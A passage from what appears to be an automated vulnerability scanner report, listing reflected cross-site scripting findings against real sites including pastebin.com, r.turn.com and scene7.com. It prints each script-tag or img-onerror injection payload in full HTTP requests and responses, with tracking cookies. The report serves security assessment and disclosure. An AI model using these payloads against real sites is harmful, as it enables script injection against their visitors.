This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=E0656072b1b<script>alert(1)</script>01f0fef14a3 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_IH_7="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRcudMd6UdHTVGVIPJjz/yF34dHT25tVh790Up6NBJPV43sAoYRKLv7Za4Rwx2/OuBlUO+TFiqzoc98k+cpjMMg5USvXrBeFN3oCTNygkzLwCEpbHvTO1DFmYTno4bvhgTyCVUCll7KXXgfUAI0Py2fGh6MPSOt7ObjB3woINiVApH0A=="; rsi_us_1000000="pUMdJc+g/xMU1j3Eq6mR0x2J+T7uFxaPzsVdi8Ni1rYm6J68l6acsXsd9OYJYVlly8cr+J2K6AddxvkNjEpT8X3w4B4lBCjXwQIbR0jlRnTHgpk5f1sQGfmFmyVEtx+gxjLU3wnYgttSfhxMbzfydi3AAGoKvCmxF7TxORX1mqADXOanLZaz6sJGSEz90RB0KeOifwnURRHhCsVk3w6bNETq9nc+k2ll9KMbb8sWgiVgH2Zd335WJFX18Hy2/BgZNsf9NM8irA1uZi6UJW+DKzXg+99MdH2//xFgX+ZPOQDsoy9Be8AFAdjuskLYUDxsUlNhyqQaWwGvJyuAuf0Ss2l0uH6jvt4FcFbTkZBk9q7caxdxw2TJZQfbfDKhb2bpjeGdZoqJ44fCKH3DoxpfXBIW3ohUSVLFElW2dztek4Fn2fadkI5nP/Lat0PGhonkfKaiqyqMWT6PSUH0tnXPvFFCQ2Evk4Yarbh4YiTvgdw/8E5sj9TdpiToNMPKRMu250cwirAHBwhZoo9S04egkJIm5Tk0Su5s9KFZoDc41rkgS7pZnikG/LfPzPlgEjldlohervfYVZ/LaMjmJuZfR6SZUqtPVd8O7nMqgFt6bf4Md0jAFU3IbNqPuCHHS/cEp3nCnspLAR4e1R+gGitqEYVA+JOiq4sp+fRtOiU1jtoQ4FRVaJP/03I9PtH0VkJpFhL7CuayYoDhdKu0ByWZy+KTL1v/OQpmY1nftZfGOHQjKSF2P1zTGfEpRqL2kw=="; rtc_d1yn=MLuB648HgV9DFVRAcMKRV8BItq+wLgaJCK6wgl48oj9LoBSPJndTC+3SWz6oSpsoBhz2GNjcf7S7fSphFBYcKsIf2/9slCRRHs5A9NFuqZhZbQLdIFwm9RF6U8URf2N/KH0qGR1QY3DxZLycbLU=; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtlR8qmZ5EYm2QQMyGpObby6k11tNu345vUZaCKjYPpg7DctEzT/YmvwSV+h+zyWJPM6bhzBtArAADE6trLuK01RUTHtoDIZGMfgWkONiixNKs3XuqReSNH/gBjg==; udm_0=MLv381MJZihn557Fg9CgawbiVA1lL/FuRN2YvTxnLmFE6w8NbGJPaUPFCwsFgR3sv7657LwRKNAmXEh2aSb0Zv5bckFYISl1fyfVVAwqoQYt9FhqVjQGjuSl8z6Qv6cnv53ckanPEOOXZwkn9RV/ihHtOHpoTy2LVEsR1+0TtypJG/O4klSyrU9gYKd0fFdaupz4d8b9Rxi9djrm40BWjcIFDUCw9gcW5BQs/64wXLGemKagzfYsk+Be/OQ5xaBZaSj3b4jGGpgM2F1qkr0iYXTLNphhYma6fAml/0UvewxClD7zldQ+WamH9ng0nRYrjN3PcYJlfkkul9U4BAGhifhxBj1sv6C4RRL6UBTL2KUx9T8V8YFXz7YPDtGbM6sgCs3RB0SA0ycbHqx2WVsbyLukuWo7YvdldaMxV/fshebvGXE1IKazvSkswdMfyeVYT15UrtqFCLGABTryXWv1F+XgNgqFTFNm1drz5UX6WcHHivrY2QGkCz6fiXlqtAAj2PQTrzRvQYY3+HAqdC/dwE6FNus7vDx+1K0MO1Vn1WWhUby27gM/6Lvnw+nLSKBM9mlSNVmKh4Cl1j5OW52264m48pkDKKkPrWJxRKzTa8xhzae+N2XhA3eQHMYIuSfo6DKhiNWS8b6W6n7VDBCgOJVgcqeSwyQO9riL8Y+OBI7v42chasKmrve6popZvLjbjISWE/8fGIxOEnCWfaty7H8syDJC8iLF+r2Pk9zRn7S7inz1SkdFk46H89ZroiU3qJ8F4oMHF00Dqpt0O0HkGEPMNMCBv6ze8LvUmIjdewmx8LI2ISHGcVDcWQcRml0Ptz3tmYMOzEcNnD/OWoGqhyV5W6e32jcAAG35EbiTDNfnpMuUqc30dB9i8xri9Uidkc3TiOUOJ3qWTz5ZJEKhbm4X9u7mxzmpya1rCbaVfzsAA6Q=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 16 May 2011 01:19:40 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 17 May 2011 01:19:40 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:19:39 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "E0656072B1B<SCRIPT>ALERT(1)</SCRIPT>01F0FEF14A3" was not recognized.
*/

5.54. http://pastebin.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50732"><script>alert(1)</script>d0c46a64a0 was submitted in the REST URL parameter 1. This input was echoed as 50732\"><script>alert(1)</script>d0c46a64a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico50732"><script>alert(1)</script>d0c46a64a0 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:57 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:57 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/favicon.ico50732\"><script>alert(1)</script>d0c46a64a0"/>
...[SNIP]...

5.55. http://pastebin.com/i/fixed.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/fixed.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6806"><script>alert(1)</script>a1c2cdd2d5 was submitted in the REST URL parameter 1. This input was echoed as e6806\"><script>alert(1)</script>a1c2cdd2d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ie6806"><script>alert(1)</script>a1c2cdd2d5/fixed.css?1 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/ie6806\"><script>alert(1)</script>a1c2cdd2d5/fixed.css?1"/>
...[SNIP]...

5.56. http://pastebin.com/i/fixed.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/fixed.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9ab5"><script>alert(1)</script>a013d73a3b1 was submitted in the REST URL parameter 2. This input was echoed as a9ab5\"><script>alert(1)</script>a013d73a3b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/fixed.cssa9ab5"><script>alert(1)</script>a013d73a3b1?1 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/i/fixed.cssa9ab5\"><script>alert(1)</script>a013d73a3b1?1"/>
...[SNIP]...

5.57. http://pastebin.com/i/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f371c"><script>alert(1)</script>d78be778a57 was submitted in the REST URL parameter 1. This input was echoed as f371c\"><script>alert(1)</script>d78be778a57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /if371c"><script>alert(1)</script>d78be778a57/style.css?9 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/if371c\"><script>alert(1)</script>d78be778a57/style.css?9"/>
...[SNIP]...

5.58. http://pastebin.com/i/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /i/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0eb9"><script>alert(1)</script>38e6086d1db was submitted in the REST URL parameter 2. This input was echoed as c0eb9\"><script>alert(1)</script>38e6086d1db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/style.cssc0eb9"><script>alert(1)</script>38e6086d1db?9 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/trends
Cookie: cookie_key=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:48 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:48 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 11777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/i/style.cssc0eb9\"><script>alert(1)</script>38e6086d1db?9"/>
...[SNIP]...

5.59. http://pastebin.com/trends [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /trends

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ddfb"><script>alert(1)</script>54be6eeb293 was submitted in the REST URL parameter 1. This input was echoed as 5ddfb\"><script>alert(1)</script>54be6eeb293 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trends5ddfb"><script>alert(1)</script>54be6eeb293 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 12233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/trends5ddfb\"><script>alert(1)</script>54be6eeb293"/>
...[SNIP]...

5.60. http://pastebin.com/trends [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pastebin.com
Path:   /trends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a94d7"><script>alert(1)</script>ffd01446e74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a94d7\"><script>alert(1)</script>ffd01446e74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trends?a94d7"><script>alert(1)</script>ffd01446e74=1 HTTP/1.1
Host: pastebin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sun, 15 May 2011 21:30:47 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.4-dev
Set-Cookie: cookie_key=2; expires=Sun, 12-Jun-2011 21:30:47 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 12237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<meta property="og:url" content="http://pastebin.com/trends?a94d7\"><script>alert(1)</script>ffd01446e74=1"/>
...[SNIP]...

5.61. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad70c"><script>alert(1)</script>dc12055dabf was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=ad70c"><script>alert(1)</script>dc12055dabf&sp=y&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc; uid=4325897289836481830; rrs=1; rds=15110; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:36 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:22:36 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=2757321833532286343&fpid=ad70c"><script>alert(1)</script>dc12055dabf&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.62. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7525b"><script>alert(1)</script>0d9ff59c63a was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=7525b"><script>alert(1)</script>0d9ff59c63a&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc; uid=4325897289836481830; rrs=1; rds=15110; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:22:42 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:22:42 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=2667438275241241951&fpid=4&nu=n&t=&sp=7525b"><script>alert(1)</script>0d9ff59c63a&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.63. http://s7d5.scene7.com/is/image/bluestembrands/4NL9200000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NL9200000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5c9a7<img%20src%3da%20onerror%3dalert(1)>4bb90ff2d96 was submitted in the REST URL parameter 4. This input was echoed as 5c9a7<img src=a onerror=alert(1)>4bb90ff2d96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NL9200000010_A_9995c9a7<img%20src%3da%20onerror%3dalert(1)>4bb90ff2d96?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Mon, 16 May 2011 01:38:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:08 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NL9200000010_A_9995c9a7<img src=a onerror=alert(1)>4bb90ff2d96

5.64. http://s7d5.scene7.com/is/image/bluestembrands/4NP4530000010_A_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4NP4530000010_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f217<img%20src%3da%20onerror%3dalert(1)>cab1e7f8316 was submitted in the REST URL parameter 4. This input was echoed as 7f217<img src=a onerror=alert(1)>cab1e7f8316 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4NP4530000010_A_9997f217<img%20src%3da%20onerror%3dalert(1)>cab1e7f8316?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 94
Expires: Mon, 16 May 2011 01:38:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:32 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4NP4530000010_A_9997f217<img src=a onerror=alert(1)>cab1e7f8316

5.65. http://s7d5.scene7.com/is/image/bluestembrands/4P2023GSG0010_VD_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/4P2023GSG0010_VD_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9735b<img%20src%3da%20onerror%3dalert(1)>1263a0f8987 was submitted in the REST URL parameter 4. This input was echoed as 9735b<img src=a onerror=alert(1)>1263a0f8987 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/4P2023GSG0010_VD_9999735b<img%20src%3da%20onerror%3dalert(1)>1263a0f8987?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 95
Expires: Mon, 16 May 2011 01:38:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:09 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/4P2023GSG0010_VD_9999735b<img src=a onerror=alert(1)>1263a0f8987

5.66. http://s7d5.scene7.com/is/image/bluestembrands/F0042_VA_999 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/F0042_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2404c<img%20src%3da%20onerror%3dalert(1)>637bf066978 was submitted in the REST URL parameter 4. This input was echoed as 2404c<img src=a onerror=alert(1)>637bf066978 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/F0042_VA_9992404c<img%20src%3da%20onerror%3dalert(1)>637bf066978?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
